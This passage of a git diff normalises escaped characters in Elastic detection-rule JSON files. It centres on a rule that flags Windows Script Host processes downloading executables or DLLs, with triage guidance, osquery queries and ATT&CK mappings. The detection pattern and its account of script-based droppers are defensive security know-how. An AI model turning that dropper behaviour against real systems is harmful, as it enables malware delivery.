status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json index 409e4ebc9c3..39c5dba4936 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_107.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -90,7 +90,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json index 8d881143c8f..9385be2eb80 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_108.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and file.extension : (\"exe\", \"dll\")]\n", "related_integrations": [ { @@ -91,7 +91,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json index 04046e907a0..809be8cfe4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_104.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json index dd611092cbe..287a5c9c2a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_105.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json index b46b1f655eb..aa43ecb96b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_106.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json index 0911b5c8be9..ef0c10d39ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json +++ b/packages/security_detection_engine/kibana/security_rule/1d72d014-e2ab-4707-b056-9b96abe7b511_107.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json index caeb2831ea3..7c4a7e1c348 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_2.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json index ddc31dc6409..a87f72ca0c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_3.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json index 6d0e1e69830..2e49af2158e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_4.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json index 9472f1cd213..4bcdf2f487f 100644 --- a/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1d9aeb0b-9549-46f6-a32d-05e2a001b7fd_5.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json index 3341b351e4e..f16756e838d 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_102.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json index e658a6b8fea..383d35ba352 100644 --- a/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/1dcc51f6-ba26-49e7-9ef4-2655abb2361e_103.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "1dcc51f6-ba26-49e7-9ef4-2655abb2361e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added 